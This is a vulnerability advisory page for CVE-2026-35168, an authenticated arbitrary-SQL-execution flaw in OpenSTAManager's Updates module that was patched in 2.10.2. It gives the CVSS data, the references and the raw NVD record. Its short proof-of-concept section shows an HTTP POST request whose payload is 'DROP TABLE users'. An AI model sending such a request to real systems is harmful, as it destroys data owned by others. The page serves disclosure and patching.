CVE-2026-35168

Description

OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further reducing database integrity protections. This issue has been patched in version 2.10.2.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:* - VULNERABLE

OpenSTAManager < 2.10.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

POST /index.php?op=risolvi-conflitti-database HTTP/1.1
Host: target.com
Content-Type: application/json
Cookie: [Session Cookie]

["DROP TABLE users; --"]

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35168
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35168
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35168/
[4] VulDB https://vuldb.com/cve/CVE-2026-35168
[5] https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74
[6] https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2
[7] https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98
[8] https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35168", "sourceIdentifier": "[email protected]", "published": "2026-04-02T14:16:31.543", "lastModified": "2026-04-07T18:30:59.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further reducing database integrity protections. This issue has been patched in version 2.10.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.10.2", "matchCriteriaId": "37690084-64E6-4E8B-8A92-8B55C8FC1E9F"}]}]}], "references": [{"url": "https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}